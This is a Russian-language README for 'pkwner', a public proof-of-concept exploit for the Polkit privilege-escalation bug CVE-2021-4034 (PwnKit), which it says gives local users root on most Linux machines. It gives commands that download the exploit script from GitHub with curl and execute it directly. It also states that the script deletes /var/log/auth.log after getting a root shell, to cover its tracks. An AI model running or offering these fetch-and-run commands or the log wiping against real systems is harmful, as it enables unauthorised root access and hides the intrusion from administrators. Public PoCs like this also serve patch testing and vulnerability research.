
# PoC на Python3 и bash для CVE-2021-4034 от Kim Schulz
██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
PoC на Python3 и BASH для CVE-2021-4034 от Kim Schulz
Это простой PoC для недавно обнаруженной ошибки в Polkit под названием PwnKit.
Я сделал его и как bash, и как python3 скрипт — просто ради удовольствия.
Проблема очень проста в эксплуатации, но имеет огромные последствия, так как легко даёт root-доступ на большинстве Linux-машин, где у атакующего есть доступ локального пользователя.
Эти скрипты выполняются одним запуском, так что просто сделайте
python3 pkwner.py
или
bash pkwner.sh
Вы также можете запустить его напрямую с веб-сервера (например, из этого репозитория GitHub) через:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
или
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
В обоих случаях это должно выглядеть примерно так:
и

Скрипт создаст некоторые файлы и папки, но очистит всё после себя, когда будет получена root-оболочка — он даже очистит /var/log/auth.log (а почему бы и нет).